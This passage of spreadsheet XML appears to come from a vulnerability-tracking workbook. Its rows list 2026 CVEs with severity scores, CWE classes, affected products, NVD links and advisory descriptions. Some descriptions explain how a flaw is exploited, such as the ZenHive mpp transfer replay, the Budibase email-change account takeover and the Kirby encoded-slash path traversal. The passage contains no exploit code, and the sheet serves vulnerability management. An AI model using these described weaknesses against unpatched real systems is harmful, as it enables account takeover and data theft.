      <c r="F1765" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1765" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1765" s="5" t="inlineStr"/>
      <c r="I1765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1765" s="5" t="inlineStr"/>
      <c r="K1765" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1765" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t>
        </is>
      </c>
    </row>
    <row r="1766">
      <c r="A1766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73136</t>
        </is>
      </c>
      <c r="C1766" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1766" s="5" t="inlineStr"/>
      <c r="F1766" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1766" s="5" t="inlineStr"/>
      <c r="H1766" s="5" t="inlineStr">
        <is>
          <t>zenhive:machine_payments_protocol</t>
        </is>
      </c>
      <c r="I1766" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1766" s="5" t="inlineStr"/>
      <c r="K1766" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L1766" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Capture-replay in ZenHive mpp allows an unauthenticated third party to obtain paid resources by replaying a transfer settled by an unrelated payer.
MPP.Methods.Tempo normally binds a settled TIP-20 TransferWithMemo to the specific challenge under verification through an attribution nonce carried in the memo. When a static "memo" is configured in method_config, check_matched_memo_binding/3 returns the match unconditionally and that binding is skipped, leaving only token, recipient, amount and the static memo value to match on. The static memo is echoed in every unauthenticated 402 response and Tempo transfers are public, so an attacker can take any matching transfer paid by a legitimate customer, request a fresh challenge for the same route, and present that transaction hash as a type="hash" credential. The hash path performs no sender or signature check tying the presenter to the wallet that broadcast the transfer.
This issue affects mpp: from 0.6.1 before 0.6.4.</t>
        </is>
      </c>
      <c r="M1766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73136</t>
        </is>
      </c>
    </row>
    <row r="1767">
      <c r="A1767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73214</t>
        </is>
      </c>
      <c r="C1767" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1767" s="5" t="inlineStr"/>
      <c r="F1767" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1767" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1767" s="5" t="inlineStr"/>
      <c r="I1767" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1767" s="5" t="inlineStr"/>
      <c r="K1767" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1767" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.16.0, dtls_server_input_handler() and create_new_connected_udp_socket() in src/apps/relay/dtls_listener.c retain OpenSSL dtls1_reassemble_fragment() state for a 35-byte fragmented ClientHello declaring a 650,000-byte handshake before cookie validation, allowing an unauthenticated remote sender using fresh UDP tuples to exhaust memory without TURN credentials, a completed handshake, a valid cookie, or source spoofing. This issue is fixed in version 4.16.0.</t>
        </is>
      </c>
      <c r="M1767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73214</t>
        </is>
      </c>
    </row>
    <row r="1768">
      <c r="A1768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73303</t>
        </is>
      </c>
      <c r="C1768" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1768" s="5" t="inlineStr"/>
      <c r="F1768" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1768" s="5" t="inlineStr"/>
      <c r="H1768" s="5" t="inlineStr"/>
      <c r="I1768" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1768" s="5" t="inlineStr"/>
      <c r="K1768" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1768" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.0, POST /api/v2/email on account.budibase.app accepted a client-controlled accountId without binding it to the authenticated session, while checking only currentEmail. An authenticated attacker who obtains a victim account identifier can start the email-change workflow for the victim, receive and submit the verification code through POST /api/v2/email/verification, move the victim email to an attacker-controlled address, and complete a password reset as the victim. This issue is fixed in version 3.40.0.</t>
        </is>
      </c>
      <c r="M1768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73303</t>
        </is>
      </c>
    </row>
    <row r="1769">
      <c r="A1769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73310</t>
        </is>
      </c>
      <c r="C1769" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1769" s="5" t="inlineStr"/>
      <c r="F1769" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1769" s="5" t="inlineStr"/>
      <c r="H1769" s="5" t="inlineStr"/>
      <c r="I1769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1769" s="5" t="inlineStr"/>
      <c r="K1769" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1769" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authorization flaw in the OAuth2 token endpoint that allows attackers controlling any allowlisted redirect URI to bypass redirect URI binding by submitting a different allowlisted URI than the one recorded at authorization time. Attackers can exchange an intercepted authorization code using a mismatched redirect URI to steal OAuth2 tokens from intercepted authorization flows.</t>
        </is>
      </c>
      <c r="M1769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t>
        </is>
      </c>
    </row>
    <row r="1770">
      <c r="A1770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73658</t>
        </is>
      </c>
      <c r="C1770" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1770" s="5" t="inlineStr"/>
      <c r="F1770" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1770" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1770" s="5" t="inlineStr"/>
      <c r="I1770" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1770" s="5" t="inlineStr"/>
      <c r="K1770" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22, CWE-862</t>
        </is>
      </c>
      <c r="L1770" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev is a platform for building and deploying fully managed AI agents and workflows. From 4.4.2 until 4.5.0-rc.5, Aws4FetchClient.buildUrl() and Aws4FetchClient.presign() in apps/webapp/app/v3/objectStoreClient.server.ts assign user-controlled packet keys to URL.pathname, while apps/webapp/app/routes/api.v1.packets.$.ts accepts params["*"] without rejecting dot segments and uses findResource: async () =&gt; 1 without per-resource ownership validation. WHATWG path normalization collapses .. segments before signing, allowing a caller with a valid environment API key to obtain presigned URLs for another tenant's object-store keys and read or overwrite task payloads. This issue is fixed in version 4.5.0-rc.5.</t>
        </is>
      </c>
      <c r="M1770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73658</t>
        </is>
      </c>
    </row>
    <row r="1771">
      <c r="A1771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73666</t>
        </is>
      </c>
      <c r="C1771" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1771" s="5" t="inlineStr"/>
      <c r="F1771" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1771" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1771" s="5" t="inlineStr"/>
      <c r="I1771" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1771" s="5" t="inlineStr"/>
      <c r="K1771" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1771" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a developer platform for Kubernetes. Prior to 1.0.4, 1.1.4, and 1.2.1, the OpenChoreo Backstage backend hardcoded backend.auth.dangerouslyDisableDefaultAuthPolicy and auth.providers.guest.dangerouslyAllowOutsideDevelopment to true, exposing /api/* without authentication and allowing unauthenticated catalog reads, scaffolder log reads, and catalog location creation or deletion. This issue is fixed in versions 1.0.4, 1.1.4, and 1.2.1.</t>
        </is>
      </c>
      <c r="M1771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73666</t>
        </is>
      </c>
    </row>
    <row r="1772">
      <c r="A1772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74907</t>
        </is>
      </c>
      <c r="C1772" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1772" s="5" t="inlineStr"/>
      <c r="F1772" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1772" s="5" t="inlineStr"/>
      <c r="H1772" s="5" t="inlineStr"/>
      <c r="I1772" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1772" s="5" t="inlineStr"/>
      <c r="K1772" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1772" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains a path traversal vulnerability in the static asset server within index.php that uses string prefix matching instead of directory-boundary validation. Unauthenticated attackers can access files in sibling directories by exploiting directory names that extend the base path string, such as requesting assets-secret when assets is the configured base.</t>
        </is>
      </c>
      <c r="M1772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74907</t>
        </is>
      </c>
    </row>
    <row r="1773">
      <c r="A1773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75594</t>
        </is>
      </c>
      <c r="C1773" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1773" s="5" t="inlineStr"/>
      <c r="F1773" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1773" s="5" t="inlineStr">
        <is>
          <t>apache, nginx</t>
        </is>
      </c>
      <c r="H1773" s="5" t="inlineStr"/>
      <c r="I1773" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1773" s="5" t="inlineStr"/>
      <c r="K1773" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1773" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. Prior to 4.9.5 and 5.5.2, depending on the release line, Kirby's media handler in src/Cms/Media.php allowed Kirby\Cms\Media::thumb() to append a path-bearing filename to a validated parent media directory. On nginx, PHP's built-in server, or Apache with AllowEncodedSlashes enabled, a remote attacker could submit encoded slash characters such as %2f in the filename and traverse outside the parent's media directory. Differences between responses for existing and nonexistent thumbnail configurations disclosed whether an arbitrary .json file existed, and a .json file containing a valid filename key could cause the referenced image to be returned and the job file to be deleted. The related file::version path in src/Filesystem/Asset.php also accepted ../ sequences outside the intended index root. This issue is fixed in versions 4.9.5 and 5.5.2.</t>
        </is>
      </c>
      <c r="M1773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75594</t>
        </is>
      </c>
    </row>
    <row r="1774">
      <c r="A1774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76191</t>
        </is>
      </c>
      <c r="C1774" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1774" s="5" t="inlineStr"/>
      <c r="F1774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1774" s="5" t="inlineStr"/>
      <c r="H1774" s="5" t="inlineStr"/>
      <c r="I1774" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1774" s="5" t="inlineStr"/>
      <c r="K1774" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1774" s="5" t="inlineStr">
        <is>
          <t>Animate is affected by an Improper Control of Generation of Code ('Code Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t>
        </is>
      </c>
    </row>
    <row r="1775">
      <c r="A1775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76202</t>
        </is>
      </c>
      <c r="C1775" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1775" s="5" t="inlineStr"/>
      <c r="F1775" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1775" s="5" t="inlineStr"/>
      <c r="H1775" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1775" s="5" t="inlineStr"/>
      <c r="K1775" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1775"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M1775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t>
        </is>
      </c>
    </row>
    <row r="1776">
      <c r="A1776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77348</t>
        </is>
      </c>
      <c r="C1776" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1776" s="5" t="inlineStr"/>
      <c r="F1776" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1776" s="5" t="inlineStr"/>
      <c r="H1776" s="5" t="inlineStr"/>
      <c r="I1776" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1776" s="5" t="inlineStr"/>
      <c r="K1776" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L1776" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, the fix for CVE-2026-33407 (GHSA-hhjq-82f8-m6rc, "SSRF via HTTP Proxy Environment Variable") hardened endpoints/logos/search.php by disabling cURL proxying (CURLOPT_PROXY = '' + CURLOPT_NOPROXY = '*'). However, Wallos ships a second, near-identical, unauthenticated logo-image search endpoint — endpoints/payments/search.php — that was not given the same hardening. It still passes the HTTP_PROXY/HTTPS_PROXY environment variable straight into CURLOPT_PROXY. This issue has been patched in version 5.0.0.</t>
        </is>
      </c>
      <c r="M1776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77348</t>
        </is>
      </c>
    </row>
    <row r="1777">
      <c r="A1777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77358</t>
        </is>
      </c>
      <c r="C1777" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1777" s="5" t="inlineStr"/>
      <c r="F1777" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1777" s="5" t="inlineStr"/>
      <c r="H1777" s="5" t="inlineStr"/>
      <c r="I1777" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1777" s="5" t="inlineStr"/>
      <c r="K1777" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1777" s="5" t="inlineStr">
        <is>
          <t>cpp-httplib is a C++ header-only HTTP/HTTPS library. In versions 0.33.0 through 0.50.0, the TLS-enabled WebSocket client frees the TLS session before closing the WebSocket that still uses it, producing a use-after-free. In WebSocketClient::shutdown_and_close the SSL object is freed and the pointer cleared, but the subsequent WebSocket close still sends a close frame through the SSL socket stream, which holds a raw copy of the now-dangling session pointer and reads from and writes to the freed memory. The same freed-then-used ordering is reachable through the client's destructor and its connect path, so ordinary teardown of a secure WebSocket connection triggers the defect. This issue is fixed in version 0.50.1.</t>
        </is>
      </c>
      <c r="M1777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77358</t>
        </is>
      </c>
    </row>
    <row r="1778">
      <c r="A1778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77634</t>
        </is>
      </c>
      <c r="C1778" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1778" s="5" t="inlineStr"/>
      <c r="F1778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1778" s="5" t="inlineStr"/>
      <c r="H1778" s="5" t="inlineStr"/>
      <c r="I1778" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1778" s="5" t="inlineStr"/>
      <c r="K1778" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L1778" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to versions 4.5.12, 4.6.5, 5.1.8, 5.2.14, and 5.3.7 on their respective release lines, custom mail headers added with Message::setHeaders() or Message::addHeaders() do not have CRLF bytes removed, allowing header injection when user-controlled data is used in message headers. This issue is fixed in versions 4.5.12, 4.6.5, 5.1.8, 5.2.14, and 5.3.7.</t>
        </is>
      </c>
      <c r="M1778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77634</t>
        </is>
      </c>
    </row>
    <row r="1779">
      <c r="A1779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77641</t>
        </is>
      </c>
      <c r="C1779" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1779" s="5" t="inlineStr"/>
      <c r="F1779" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1779" s="5" t="inlineStr"/>
      <c r="H1779" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="I1779" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1779" s="5" t="inlineStr"/>
      <c r="K1779" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="L1779" s="5" t="inlineStr">
        <is>
          <t>tor before 0.4.9.9 was prone to a NULL write after free when sending a CONFLUX_SWITCH cell fails. The return value of relay_send_command_from_edge() was   ignored, so a send failure (which calls circuit_mark_for_close()  and removes the leg via cfx_del_leg()) would go undetected, causing the caller to write to the now-freed current leg and resulting in a crash. This is TROVE-2026-017.</t>
        </is>
      </c>
      <c r="M1779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77641</t>
        </is>
      </c>
    </row>
    <row r="1780">
      <c r="A1780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77822</t>
        </is>
      </c>
      <c r="C1780" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1780" s="5" t="inlineStr"/>
      <c r="F1780" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1780" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1780" s="5" t="inlineStr"/>
      <c r="I1780" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1780" s="5" t="inlineStr"/>
      <c r="K1780" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1780" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway could allow a remote authenticated attacker to obtain sensitive information due to server-side request forgery via DNS rebinding.</t>
        </is>
      </c>
      <c r="M1780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77822</t>
        </is>
      </c>
    </row>
    <row r="1781">
      <c r="A1781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77968</t>
        </is>
      </c>
      <c r="C1781" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1781" s="5" t="inlineStr"/>
      <c r="F1781" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1781" s="5" t="inlineStr"/>
      <c r="H1781" s="5" t="inlineStr"/>
      <c r="I1781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1781" s="5" t="inlineStr"/>
      <c r="K1781" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1781" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator's ClusterRole grants secrets: [create, get, list, update, watch] across all namespaces. While the operator uses a controller-runtime label-selector cache as a memory optimization, the ServiceAccount token authorizes read access to every Secret in the cluster. The operator also bypasses the cache via direct API calls. Compromise of the operator pod would yield read access to every Secret in the cluster, including bootstrap tokens, cloud credentials, and other operators' secrets.</t>
        </is>
      </c>
      <c r="M1781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t>
        </is>
      </c>
    </row>
    <row r="1782">
      <c r="A1782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78491</t>
        </is>
      </c>
      <c r="C1782" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1782" s="5" t="inlineStr"/>
      <c r="F1782" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1782" s="5" t="inlineStr"/>
      <c r="H1782" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I1782" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1782" s="5" t="inlineStr"/>
      <c r="K1782" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L178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1782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78491</t>
        </is>
      </c>
    </row>
    <row r="1783">
      <c r="A1783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79645</t>
        </is>
      </c>
      <c r="C1783" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1783" s="5" t="inlineStr"/>
      <c r="F1783" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1783" s="5" t="inlineStr"/>
      <c r="H1783" s="5" t="inlineStr"/>
      <c r="I1783" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1783" s="5" t="inlineStr"/>
      <c r="K1783" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1783"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M1783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79645</t>
        </is>
      </c>
    </row>
    <row r="1784">
      <c r="A1784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="C1784" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1784" s="5" t="inlineStr"/>
      <c r="F1784" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1784" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1784" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="I1784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1784" s="5" t="inlineStr"/>
      <c r="K1784" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1784" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="1785">
      <c r="A1785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81356</t>
        </is>
      </c>
      <c r="C1785" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1785" s="5" t="inlineStr"/>
      <c r="F1785" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1785" s="5" t="inlineStr"/>
      <c r="H1785" s="5" t="inlineStr"/>
      <c r="I1785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1785" s="5" t="inlineStr"/>
      <c r="K1785" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L1785" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t>
        </is>
      </c>
    </row>
    <row r="1786">
      <c r="A1786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81357</t>
